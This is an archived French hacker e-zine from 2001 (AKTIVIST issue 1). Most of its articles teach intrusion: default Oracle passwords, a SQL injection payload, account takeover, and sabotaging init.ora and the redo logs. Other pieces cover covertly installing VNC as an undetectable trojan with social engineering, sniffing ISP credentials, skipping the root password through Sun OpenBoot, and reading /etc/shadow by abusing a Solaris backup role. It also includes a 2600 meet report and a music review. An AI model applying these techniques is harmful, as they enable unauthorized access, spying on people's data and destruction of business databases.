Copy Link
Add to Bookmark
Report

AKTIVIST Issue 1

eZine's profile picture
Published in 
AKTIVIST
 · 11 Oct 2020

  

Salut à toi, toi qui vient lire ce first issue d'un mag particulier.Pourquoi perdre du temps en présentation maintenant? Autant allez à l'essentiel tout de suite. Si tu trouve les articles intéressants tu aura les greetz du staff en fin de page. Ce mag tente de rendre hommage aux pionniers de la scène française, comme Core-Dump et N0way.

NeurAlien: tu etais un exemple pour nous tous.
Bonne lecture terrien.



Cet oeuvre comporte les Philes suivants:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1.1: Introduction à Oracle xNeur0x 6.5 Ko
1.2: Pc Anywhere et VNC xNeur0x 3.1 Ko
1.3: Meet 2600 xNeur0x 4.0 Ko
1.4: Hack FAI gratuit avec windump Rys 3.2 Ko
1.5: Open Boot Prom (présentation) xNeur0x 1.7 Ko
1.6: Children Of Bodom xNeur0x 3.5 Ko
1.7: Tarback (lisez le c bien!) xNeur0x 5.4 Ko
1.8: Blah-Blah

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=AKTIVIST Issue 1 Phile 1/8 [xNeur0x] 23/02/01 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



ORACLE


par xNeur0x


Intr0dution
===========
Et bien voilà, j'attaque les premières lignes de mon article, à minuit et 27
minutes en attendant une jeune femme qui risque bien de ne pas venir... "soupir"
Commençons par un état des lieux. On est en 2001, le monde est connecté à la toile de réseaux appelée "internet".Les sites de ventes en lignes pullulent sur le web, Les pubs dédiés à la télévision aussi ... Oracle n°3 des géants informatiques tire son épingle avec ses bases de données les plus mieux bien de la planète. Pour l'histoire, sachez que Larry Elisson, le CEO d'Oracle est le seul homme d'affaire à avoir fait des bénefices cette année.Avec le plongeon de l'indice du Nasdaq, même Steve Ballmer (n°1 de Microsoft) à perdu des sous-sous cette année, le pauvre ;-)

Je vais vous donnez ici tout ce qu'il faut savoir pour une première approche
sur Oracle, de façon à attaquer sans complexe la moindre base de données qui vous tombera sous la main. Vu la popularité de l'editeur, vous êtes sur de tomber sur une base Oracle. (à 70%). Le reste c'est du pipi de chat niveau fonctionnalité, ou des "sous-bases" style M$ Access, donc on en parle même pas. J'ai fait ce phile car j'ai trouvé très peu d'article relatif au sujet sur le net.Le seul article potable est paru dans Pirate' mag n°2, on croit rêver ... Bref, si ça vous intéresse, je continuerais dans cette voie. Ce premier article s'adresse plutot aux débutants, avec quelques notions d'SQL.

L'actu d'Oracle
===============
Oracle propose actuellement la dernière version de sa base de données: Oracle
9i. C'est un package logiciel comprenant une base bien sur, mais aussi tout un tas d'utilitaires d'administration (dont nous verrons les failles), des outils pour le web, le e-commerce, ect ...

Les bases les plus répandu sont les Oracle 8i (8.1.5 et 8.1.6) fonctionnant sur presque toute les plateformes (Unix x86, Sparc, HP-UX, NT, etc ...)
On s'interressera aux failles des bases en elle-même, et dans un prochain numéro des outils d'admin à distance,on verra aussi un type d'architecture assez utilisé sur le web et pas du tout protégé: le forms 3/3

Les "grosses" failles d'Oracle
==============================
On commence par un classique: Les users et les passwd. Il faut savoir que chez
Oracle, la tradition est de rigueur depuis les années80. Vous pouvez installer n'importe quel base, jusqu'à la dernière version, vous aurez toujours les mêmes schémas installés par défaut. Voici donc dans 90% des cas les users et passwd d'administrations que bien peu de DBA (Ndr: c'est le nom de l'administrateur de base de données) changent dans leur courte vie.

Username/Pass:

SYS/manager
SYS/change_on_install
SYSTEM/manager

Voici egalement un utilisateur qui existe bien souvent, car son schéma est crée "en exemple" lors de l'installation de la base:

SCOTT/tiger

Nb: un schéma représente un utilisateur + des objets: tables, triggers, ect ...

WOrking in progress
===================
C'est bien beau mais comment faire pour pénêtrer la base? Voici le fonctionnement universel d'Oracle:
Chaque base possède un nom, un alias et un SID. En gros c'est la même chose, mais à des niveaux différents. Le SID represente la base au niveau physique: c'est le nom du répertoire sur le disque dur. Pour un SID vous pouvez avoir n alias.


la base est en ecoute sur les ports 1526 et 1521 en TCP/IP grace à un module spécifique appelé LISTENER. d'autres protocoles sont dispo mais rarement utilisés.Pour vous connectez, il suffit d'utiliser telnet sur ces ports, ou mieux l'utilitaire de connexion en ligne de commande d'Oracle: SQL+ (des clones sont dispo en Free un peu partout)
Pour pas tout vous tapez à la main, rechercher les logiciels suivant: Golden32 de Benthic Software et T.O.A.D de Quest software (dispo également en download sur le net). L'avantage de TOAD par exemple, c'est de loader d'un seul coup tout le schéma d'un utilisateur. Ainsi, grace à l'option "Schéma browser" on parcours les tables comme les répertoires d'un système avec un explorateur.

Une chaine de connexion est de ce type: <user>/<passwd>@<nom_de_la_base>

exemple:

SQL>connect sys/manager@hélise

Nb: par defaut le SID des bases s'appelle ORCL. Et bien souvent nom_base = orcl ou oracle... hé hé.
Pensez à votre fichier hosts pour par avoir à taper une IP à chaque fois. Si vous tapez dans une base supérieure à la version 7, vous êtes sur que TCP/IP est utilisé. Donc c'est bien pratique, on peut utiliser toutes les failles connu d' ipv4.

Comment s'effectue une recherche?
Pour des formulaires simple, style via le web:

SELECT <col1>,<col2>,<colx>
FROM <table1>,<table2>,<tablex>
WHERE <colx> LIKE "%<attribut>%";

La faille vient du LIKE. En effet à l'intérieur des " " On peut mettre une autre commande SQL !

Quand dans votre formulaire sur le web vous avez un champ de requete, c'est l'<attribut> que l'on attend, ainsi, essayer d'entrer directement des commandes SQL entre " "

Exemple:

"; DESC USER_CATALOG"

Qu'est-ce que ça fait:

SELECT <col1>,<col2>,<colx>
FROM <table1>,<table2>,<tablex>
WHERE <colx> LIKE "%";
DESC USER_CATALOG
;

au lieu de faire votre selection, la base vous affiche toutes les tables de l'utilisateur! sympa hein?
Bon ce style d'accès est vraiment pas propre, faut tatonner, essayer des kilos de commandes avant d'avoir quelquechose d'utilisable. Le mieux est encore de se connecter directement à la base, via SQL+


And N0w ?
===============
Admettons que vous êtes connecté en sys sur une base d'un site quelconque.
essayez les commandes suivantes:

SQL> desc user$
cette commande vous donnera la liste des utilisateurs de la base ainsi que les
pass, mais pas de bol: cryptés.
On s'interressera au décryptage brute une autre fois. Disons que les données d'un utilisateurs particulier vous intéresse, appelons le user1. Si vous êtes sans pitié, il vous suffit de changer son mot de passe, puis de vous
connecter à sa place:

SQL> grant connect,resource to user1 identified by toto;
Maintenant il suffit de vous connecter avec ce mot de passe:

SQL> connect user1/toto@hélise
Si vous avez un semblant de connaissance SQL, alors les possibilitées sont
infinies! En fait, acceder à une base de données peut se réveler très utile pour trouver tout un tas d'info sur les users. Souvent même, ils stockent leurs password dans la base! C'est une source inépuisable pour faire du SE.

Nb: rappel de quelques mots clés:
select, update, delete (selection, creation/modif, effacement)
where, count, order by ... (filtres)

Crash Override
==============
Les fichiers relatifs à la base se trouve dans <ORACLE_HOME>/admin/
si vous endommagez ou supprimez le fichier system01.dbf ... bye bye la base !
Si vous voulez pourrir plus "gentiement" les utilisateurs (et administrateurs) de la base, vous pouvez cibler les données bien sur, mais aussi les files de fonctionnement de la base.Dans le répertoire <ORACLE_HOME>/admin/pfile se trouve le fichier init.ora
C'est le fichier de démarrage de la base. La plupart des paramètres sont
facilement compréhensible. Un fichier d'exemple est fournit avec ce zip merveilleux d'où vous lisez ce phile. Tout d'abord si vous tomber sur ce fichier en parcourant les répertoire d'un serveur, vous saurez immediatement le nom de la base. C'est écrit en clair. Et init.ora est en général full granted access ...
Amusez vous à changer les valeurs de open_cursors par exemple. si ce paramètre est égal à 0, plus personne ne pourra creer de nouvel enregistrement dans la base ! Bref, y'a de quoi faire chier le monde avec ça, mais vous êtes libre de rien casser bien sur ...

Pour finir: Effectivement, toutes les transactions sont logués dans les fichiers REDO0.LOG, REDO1.LOG, ect ... Cependant, la plupart des DBA ne s'en occupent jamais ! ils sont tellement volumineux et insondables que bien souvent ils sont écrasés toutes les semaines. Ils sont utiles que pour redescendre une sauvegarde. Donc si vous êtes top-parano, ben videz-les. (ATTENTION! ne les effacez pas!!, faites un touch c mieux!, sinon la base s'arrete.)

C0ncluzion
==========

Les bases de données pulullent partout, dans toutes les entreprises,derrières les sites de commerces en lignes,
dans tes chiottes, les cheveux de ta soeur ...
Anyway, c'est tout simple à trouver et tout simple à cracker. Enj0Y ! Neur0X

PS: atttention: on a pas dit que c'etait bien d'aller voir les Bases. Surtout celles des banques hein? C'est pas une raison pour combler votre découvert!

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=AKTIVIST Issue 1 Phile 2/8 [xNeur0x] 23/02/01 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


PC anywhere / VNC


par xNeur0x



1h13 du mat... Ma belle m'as laissé. Je garde espoir? allez dites: "OUI GARDE
ESPOIR!". Que diable l'amour et les folies sexuelles! Laissons nous allez dans notre obscure passion.

[xNeur0x is away]

11h30 le lendemain: Bon finalement elle est venu et c'etait comment dire ... Merveilleux, magique ?
Bref, j'ai laissé l'article en plan, mais je reviens:
Alors Pc Anywhere de Symantec et VNC sont des logiciels de controle à distance de pc sous windows.
En gros vous voyez et agissez sur l'ecran de la cible comme si vous y étiez.
Pc anywhere est très utilisé partout dans le monde. Il est utilisé par les sociétés de services informatique pour la maintenance de leur client. Le hic c'est que bien souvent, pour simplifier les choses ils ne mettent pas de mot de passe ni même de compte pour se connecter. L'entreprise cliente branche son modem, lance Pc anywhere en mode attente de connexion. Ensuite de l'autre coté, le Pc anywhere "serveur" appel le modem et la connexion s'etablie. A ce moment précis, le serveur "prend la main" sur le poste cible. C'est assez marrant: la souris se déplace toute seule, ect ...

Avec un peu de S.E vous devez pouvoir mettre en attente de connexion une PME sans pb. Vous trouverez PC
anywhere un peu partout sur le net. Prétendez être la société de maintenance du parc par exemple, et le tour est joué. A noter aussi: certaines sociétés laisse leur modem en attente de connexion en permanence... Enjoy !!

Vnc lui est à mon avis, beaucoup moins utilisé, mais par contre dans un autre usage il vous sera bien utile. Contrairement à Pc Anywhere, il se décompose en 2 logiciel: le serveur, qui permet de rendre un pc "joiniable" et le viewer, un tout petit exécutable de ... 172Ko ! Le GROS avantage de VNC c'est: il est Open source, le viewer et le client se trouve sur bcp de Plateforme dont Linux.

Le principe est le suivant: Débrouillez vous pour installer le serveur sur un maximum de pc. Une option permet de rendre le serveur "presque" invisible, en tout cas invisble pour la plupart des sociétés. Ensuite amusez vous de n'importe où à prendre le contrôle des PC à distance! C'est puissant d'avoir accès à tout: mail, documents personnels, ... On apprend en général beaucoup de chose sur les gens! Vous allez me dire: ben oui, c'est un trojan quoi! Et bien sur le principe oui sauf que VNC ne sera JAMAIS éliminé par un antivirus ! (idem pour PCAnywhere).

C tout bande de voyeur! à venir: un tutorial complet pour modifier le serveur VNC en trojan. Vous avez un article intéressant sur VNC/Linux dans le dernier numero de LOGIN: (fév/mars). Le viewer est livré dans le zip.

Neur0X

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=AKTIVIST Issue 1 Phile 3/8 [xNeur0x] 07/03/01 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


meet 2600


par xNeur0x




aah Paris... C'est une ville bien particulière. La nuit les vieux batiments
s'illuminent et donnent à la ville un aspect magique, un peu comme dans la vieille série Belphégor. Mais ce qui m'as ammené dans la capitale ce vendredi 2 mars 2001 c'est le meeting 2600, place d'Italie, dans le XIIIeme arondissement. Conseil pour les futurs meeterz: ne venez pas AVANT 18H30 ! Sinon vous êtes condamné à poireauter 1H dans le froid devant le grand cinéma. A noter aussi que le Mc do-RDV se trouve EN BAS et non en haut, à l'intérieur du cinéma. Voilà c'est dit. Vous retrouver les infos sur le site du 2600 france: http://www.2600.fr.st. De toute façon c'est tout les premier vendredi du mois.

Pour mon premier meet j'ai eu beaucoup de chance. En effet, d'après les aventures de certains, il y a parfois un cruel manque de personne à ces meetings. Cette fois-ci on était une trentaine. Les gars d'Epsylon, Bite rouge, la scène parisienne quoi, mais j'ai eu la chance de rencontrer Syntax_Error, AgentHunt et Paran0id, des gars très bien, avec qui on peut discuter des heures et des heures. Syntax est un cracker plutot super fort. Il fait partit d'Eclipse, un groupe que beaucoup doivent connaitre. Spécialisé dans les Key-generator, il m'a parlé de la scène crack, bien différente de la scène Hack. Notamment la hierarchisation (scusez l'orthographe) des groupes. Entre cracker, supplyer, Leader... Mais surtout entre groupe: interdiction formelle de faire un key-gen d'un soft existant! tout est maintenu par la communauté. C'est assez surprenant. J'espere que Syntax pourra me faire un petit article pour Aktivist d'ici peu. Quand à Paranoid d'RTC, on a sympathisé et discuter pendant de longue heures sur la scène en général, sur les groupes en France et surtout de nostalgie, nostalgie de toute une epoque. Quand la médiatisation n'avait pas encore frappée . En résumé disons que les "grands" groupes français on disparu. Cryptel, Tipiak, Madchat et Epsylon... En fait seul RTC est actif, j'espere que nous le serons aussi. Cet emag marque le début d'une aventure qui se présente bien. On espère qu'Aktivist et RTC seront mains dans la mains pour organiser des meet un peu plus conséquent en France.

Le principe du meet 2600 est une bonne chose, car on rencontre toujours des gens avec qui on peut partager toute sorte de choses, mais pour ceux qui recherche vraiment de l'info technique, passez votre chemin. Il n'y a pas de réel thème abordé au cour d'un meet, mais c'est en discutant qu'on apprend. Ce qui à fait la force des hackers dans les années 80, c'est le partage de connaissances "en live". Tout ceux qui sont allez à des Hack-party vous le diront: on apprend plus en 3 jours de workshop à un gros meet qu'en un an de bidouillage isolé. Le but de cet article est de faire prendre conscience de cet état de fait à vous, lecteur. L'IRC est, avouons le, bien peu reluisant niveau partage de connaissance. C'est un peu la gué-guerre continuelle entre les gens sur les chans. On a peur de dire ce qu'on sait pas sous peine de se faire traiter de tous les noms, et faut dire aussi que l'orgeuil en prend un coup. Curieusement, en RL (Real Life) les gens osent parler, discuter de ce qu'il connaisse et de ce qu'il connaisse pas. C'est aussi plus simple de parler sans crainte, sans utiliser son clavier, comme quoi la communication IRL n'est pas morte! J'invite tout le monde à venir en aout prochain à la HAL2001 en Hollande. Je compte bien y aller, alors si ça vous intéresse, contactez moi.
D'ici là, pensez à venir faire un tour au 2600 à Paris, et parler !
Rendez-vous le mois prochain. 2600 rulez.

Neur0xxx (Arf, ça fait Redoxx ... NOOOOON!)


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=AKTIVIST Issue 1 Phile 4/8 [Rys] ??/03/01 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Hack des FAI gratuit avec Windump


par Rys


Cet article est paru dans le dernier numéro du 2600 magazine. Je vais essayer de faire une traduction approximative mais juste de cet article que j'ai trouvé plutot intéressant. J'espere qu'on aura un jour un 2600 en français, mais bon faut pas rêver non plus. Ceci dit, tout les articles ne sont pas toujours intéressant. Surtout ceux qui traitent des spécificités des réseaux Telco US.
Mais rentrons dans le VIF du sujet:

Windump est un logiciel super sympa. J'entend par super sympa:

- puissant: bcp d'options disponible
- simple d'emploi
- pas gros: quelques centaines de Ko
- Livrés avec les sources et les drivers !
- Bien documenté

Vous trouverez tout ce qu'il vous faut à l'adresse suivante:
http://netgroup-serv.polito.it/windump/

Recuperez l'executable qui convient à votre version de windows (95/98/2k)
ET le driver !
Suivez la belle procédure en ligne pour installer le driver en 4 secondes !
Si vous oublier le driver et lancer windump: BLUE SCREEN! ok?

Le sujet: Le probleme vient du codage "en dur" des passwords sur les cd-rom des FAI. Exemple; AOL, Free, Worldonline, ect... tout ceux qui utilise le protocole PAP ... Ceux qui utilise CHAP ... laisser tomber.

1) Installer le soft windump.
2) Installer le logiciel du FAI
3) Ouvrez une fenêtre DOS

tapez: C:\temp>windump -s 4096 -w packet.dmp

Lancer le client du FAI. faites comme si vous étiez un nouvel utilisateur, genre "oui! je vais être un nouveau mongAOl !"
une fois sur la page d'acceuil, lancer windump.
allez jusqu'à la confirmation de votre inscription,mais ne la faite pas! Puis arreter la capture par un <control-C>

On peut regarder le dump de differentes façons: Le plus simple, vous ouvrez l'archive avec un éditeur de texte et vous parcourez les lignes... Vous tomberez avec un peu de bol sur la ligne contenant le login/password.

De façon plus "Pro" reportez vous à la RFC 1334 (PPP koi!)
Exemple chez Bluelight.com/Spinway:

Le protocol PAP correspond à c023. On a un paquet qui ressemble à ça:

19:27:48:434708 20:53:45:4e:44:0
20:53:45:4e:44:0 c023 50:
0101 0024 1630 3034 626c 7265 6775 7365
7240 6d70 7370 696e 7761 7908 346d 6c38
5859 4834

Bon le paquet est modifié, ça marchera pas si vous vous logué avec ça!
Pour voir ça en Hexa, on peut faire comme on veut, peu importe. Une fois transformé, on obtient ça:

0101 0024 1630 3034 626c 7265 6775 7365 : $.004blreguse

7240 6d70 7370 696e 7761 7908 346d 6c38 : r@mpsinway.4ml8

traduction:

Username: 004blreguser@mpsinway
Pass: ça commence par 4ml8 ... j'ai pas mis la suite !


Essayer vos valeurs en Dial-up sur le réseaux et tester le. Vous devrez vous connecté sans pb, ensuite effacer le logiciel du FAI. Ensuite, mettez les valeurs dans PPPd et dégager Windows !

Enj00y!

Rys

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=AKTIVIST Issue 1 Phile 5/8 [xNeur0x] 08/03/01 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Open Boot PROM


par xNeur0x



Première question: C'est quoi L'Open Boot Prom ? on dit OBP.
C'est comme le Bios d'un PC (en Schématisant à mort) mais sur les Serveurs et stations SUN.

En gros ça permet de gérer le processus de boot et de détecter les périphériques. Plus d'autres fonctions mais ne rentrons pas trop dans les détails.

Ce qui est génial, c'est que l'OBP est accessible à tout moment. Ainsi je vous donne la commande magique: STOP - A
(un appui sur la touche STOP et la touche A simultanément) Bien sur via un clavier SUN qwerty. L'astuce c'est de balancer au noyau le code de ces 2 touches. C'est évidement très facile et je vous invite à essayer. Il vous suffit d'avoir un compte sous SunOS (n'importe quel version) et de balancer les codes des touches dans l'interpreteur de commande. (c'est plus simple en Bourne Shell qu'en C-shell mais bon)

vous verrez alors 2 trucs: soit rien (pas de bol) soir un joli prompt OK
à partir ce prompt essayer les commandes:

help (pour voir toutes les commandes)
probe-scsi-all (detection des péripheriques SCSI)
prone-ide-all (idem pour l'IDE)
printenv (toute les variables de l'OBP)
banner (un descriptif de la machine)

pour booter:

boot -s : mode single user: PAS DE MOT DE PASSE ROOT !!
boot -v : en mode "verbeux"
boot -a : mode pas à pas
boot -d : mode diagnostique, en cas de pb

à bientot pour de nouvelles surprises avec l'OBP!

Neuro-X

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=AKTIVIST Issue 1 Phile 6/8 [xNeur0x] 07/03/01 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Children Of Bodom


par xNeur0x



Je vais vous parler de zik maintenant, après s'être bien pris la tête sur Oracle et VNC vous devez en avoir plein la tête et vous vous dites: "Il me faut un remontant musical ...". Très bien: Children Of Bodom est là pour vous. Bon ceux qui n'apprecie pas ou peu le Metal et le Hardcore, c pas la peine d'aller plus loin.

Depuis que ce groupe existe, c a dire depuis 2 ans, on assiste à une renaissance du metal. Marre du Hip hop commercial? des filles dévetue dans les clips de R&B ? Bref, la scène Hardcore et plus particulièrement la scène SxE se donne à fond dans le métal, qui toutefois c'est grandement accélerré niveau tempo. Prenez un groupe hardcore bien speed genre Arkangel, soupoudrez de Black Metal, on mélange le tout est on obtient: Children Of Bodom.
Children Of Bodom c'est au premier abord un come back dans les 80'. Solo de guitare, clavier, mélodie bien "metal". On se demande si la date inscrite sur la pochette du cd (08/2000) est bonne! Les metaleux qui ecoute sont supris par la présence du clavier, mais ça ne gache rien à l'ensemble au contraire. Le type est très fort, et les habitués au Black ne seront en rien choqué par cette touche électronique.

En fait c'est génial. Techniquement, on repousse les limites de tout ce qui à été fait jusqu'à maintenant. Tout les musiciens sont des x-heros. Le guitariste-chanteur tue tout, le batteur aussi. Je vous conseille le CD avec la pochette verte. La rouge est moins bien (plus vieux). Je sais pas comment c'est possible mais cette musique motive vraiment. exemple:

tu es sur la route avec ta voiture. il pleut, tu roule à 50km/h, tu soupire, tu es mou.

[insertion du CD/ Play 1]
tu es sur la route avec ta voiture. il pleut, tu roule à 120km/h, tu ferme les yeux.

[toujours le meme CD/ play 2]
tu n'es plus sur la route mais dans le fossé, il pleut, tu roule à 150km/h en travers, tu secoue la tete de haut en bas en hurlant des mots incompréhensible.

Pour les lyrics, c'est pas "engagé"! ça ressemble à du Black, style très Héroic-Fantasy. Mais c'est sympa, y'a des refrains qu'on retient. C'est assez rare dans ce style musical. Si on ecoute COB c'est avant tout pour la musique, il faut bien le reconnaitre. Rien à voir avec la Scène Str8Edge, ou tout le monde regarde de près les paroles. COB joue plus sur les ambiances et consacre son temps à la musique c clair!

Silent Night Bodom Night

On the eve of their death
They are baptized
In the unholy waters of bodom
With no hint of the torture awaiting
to greet them at the break of dawn

When the calm is setting in
we'll watch it swiffly disappear
Too many years of silence
soon he's bound to reappear

The Reaper
is calling for you to come home
With the thrust of a switchblade
on the grip of the madman
And the waters of Bodom
turn a blood shade of red
As the Children of Bodom
take their last breath.

Bon, clair c pas top recherché. Mais le guitariste/chanteur/compositeur du groupe n'a que ... 17ans ! ecoutez le et vous le detesterez tant il joue bien.

Coté distrib pas de soucis, vous trouverez ça à la Fnac et un peu partout au rayon Metal ou Black Metal.

Neur0X_en_metal


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=AKTIVIST Issue 1 Phile 7/8 [xNeur0x] 08/03/01 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Tarback


par xNeur0x


Si vous ne devez lire qu'un article de ce zine, liseez celui-là. Pourquoi? parceque je pense que c'est de la newz de la vrai. Bon j'arrete.

Connaissez vous les roles ? non ? arf ...
rappel: Sur beaucoup de systeme Unix, on utilise NIS.
NIS c'est bien pratique, mais pas du tout secure ! En effet c'est un vieux systeme et à l'epoque il n'y avait pas de fichier shadow ! donc par soucis de compatibilité on concatene le shadow dans le passwd ! (vive John the Ripper)

Autre gros avantages de NIS (pour nous en tous cas) comme les fichiers passwd sont centralisés sur un serveur du LAN, tout passe par le rezo! (vive snoop ou tcpdump)

Bref, tout le monde devrait installer NIS+, mais personne le fait car c trop compliqué!

rappel2: pour voir si vous êtes en service NIS, tapez
%ypcat passwd
si vous avez kekchose c bon !

Mais bon, depuis le temps que NIS existe, "ils" ont trouvé la parade : LES ROLES


RBAC(Role Based Access Control) donne une alternative au modèle de sécurité "tous les privilèges ou aucun". Le problème avec le modèle traditionel Unix n'est pas seulement que le root soit très puissant mais que les autres utilisateurs n'aient pas suffisament de privilèges pour rêgler leurs propres problèmes. RBAC permet d'assigner certains privilèges d'administrateurs à des utilisateurs. (ça sent bon tout ça non ??)

Avec RBAC, vous pouvez donner la possiblité à de simples utilisateurs de résoudre eux-même leurs problèmes en leurs assignant des packages correspondant aux privilèges nécesaires. Les possiblités du root peuvent être divisées en plusieurs packages qui seront assignés séparément pour partager les responsablités d'administration.

En résumé: RBAC permet la séparation des pouvoirs, le controle de la délégation des privilèges aux autres utilisateurs et un degré variable de controle d'accès.

C4r4ct3ristiks:
===============

Autorisation: Permission utilisée pour accorder l'accès à une fonction restreinte

Profil d'execution: (ou plus simplement Profil) Mécanisme interne regroupant les auttorisations et les commandes ayant des attributs spéciaux, par exemple, les identités des groupes et des utilisateurs.

Role: Type spécial de compte utilisateur permettant l'éxécution de taches administratives spécifiques.


CompoNEnts:
============
RBAC met en relation 4 bases de données pour fournir aux utilisateurs des accès privilégiés:

user_attr: qui associe les users et les roles avec les autorisations et les profils

auth_attr: définie les autorisations

prof_attr: definie les profils

exec_attr: définie les opérations privilégiées associées à un profil

Syntaxe:
========
chaque table à la meme syntaxe, c du grand classique:

le caractère : est le séparateur de champ
ex: nom:qualifieur:res1:res2:attribut

le caractère ; sépare les paires clé-valeur dans les champs d'attributs
ex: type_attribut=valeur;profile_attribut=valeur;

le caractère , sépare une liste ordonnée dans une clé d'attribut spécifique, par exemple: ...;profile_attribut=profile_access1,profile_access2, ...

Acceder à un role:
==================

Pour assumer un role, servez vous de la commande su. Vous ne pouvez pas vous logguez avec un role.

% su monrole
Password:
#


Pour exécutez les commandes du profil, tapez les simplements dans un shell, ex:

#lpadmin -p maprinter options

ici, la commande lpadmin est éxécutée avec les attributs du processus, UID et GID spéciaux, qui ont été définis pour la commande lpadmin dans les profils assumés par le rôle.


Gestion des roles:
==================

roleadd: ajoute un role sur le systeme
useradd: ajoute un compte utilisateur au systeme

La commande roleadd:
options courantes:

-c commentaires
-d dir: le rep d'acceuil du nouveau role
-m création du rep s'il existe pas
-A autorisation et -P profile

exemple:
#roleadd -m -d /export/home/tarback -c "backup privilégié" -P\ "Backup and Restore" tarback

Cette commande crée un nouveau role appelé tarback, dont on verra la subtilité tt à l'heure ... A noter que ce type de role est TRES souvent utilisé.

Let's GOO!
==========

Bon, vous etes sur un systeme avec un utilisateur tout con, appelons le userb.
regarder dans /etc/user_attr si vous avez une ligne du style:

userb::::type=normal;roles=datuser,tarback

le mot important est tarback, mais faite un grep avec le mot tar, c'est ce qui nous intéresse ici.


$id
uid=102(userb) gid=1(other)

Donc, comme on le voit grace à id, on a pas grand chose comme droit

$more /etc/shadow
more: cannot open /etc/shadow

Ben zut alors ! bon, on se décourage pas!

$tar cvf /tmp/shadowfile.backup /etc/shadow
tar: ./shadow: Permission denied

re-zut! Mais on se décourage tjrs pas!
c'est là qu'intervient la magie:


$su tarback
Password: saisissez le mot de passe que vous connaissez pour userb

$cd /etc
$tar cvf /tmp/shadowfile.backup ./shadow
a: ./shadow 2K

$tar tvf /tmp/shadowfile.backup
tar: blocksize= 8
-r-------- 0/3 411 Mar 06 22:08 ./shadow

$exit

on quitte le role tarback pour revenir en userb

$ls -l /tmp/shadowfile.backup
-rw-r--r-- 1 userb other 2048 Mar 06 22:10

$cd
$pwd
/export/home/userb

$tar xvf /tmp/shadowfile.backup
tar: blocksize = 4
x ./shadow, 411 bytes, 1 tape blocks

$cat shadow

c t'y pas bo ? et 1 shadow, 1 !

CONCLUSI0N:
c'est une bonne methode pour avoir un shadow, pensez aussi NIS, ça marche dans bcp de cas ypcat passwd !!!
Dans un prochain Phile, on verra comment utiliser pour sois les roles: avoir tout les privileges, a tout moment, sans cracker le compte root!


xNeur0x


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=AKTIVIST Issue 1 Phile 8/8 [???] ??/03/01 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Neur0x: Voilà, le mag est terminé. C'est un début. J'espère que vous avez aimé.
Moi je me suis bien (Ndr: pris la tête!) amusé à le faire, j'espère qu'on aura du retour. pour les insultes, les commentaires, les critiques, ect...:

aktivistfr@online.fr

En ce qui me concerne, ma VMB c'est la 122 (8 pour envoyer un message) au 0800 40 63 42 ... Sinon

xneurox@libertysurf.fr

big greetz to: RTC(esp. Paran0ïD), Toute la team Aktivist.
et aussi à: RemX, xOliviéx, K-ren, Malou, Syntax_Err0r, AgentHunt, Skoop, JoJo, Seld-on et Audrey: amour de ma vie.




loading
sending ...
New to Neperos ? Sign Up for free
download Neperos from Google Play

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT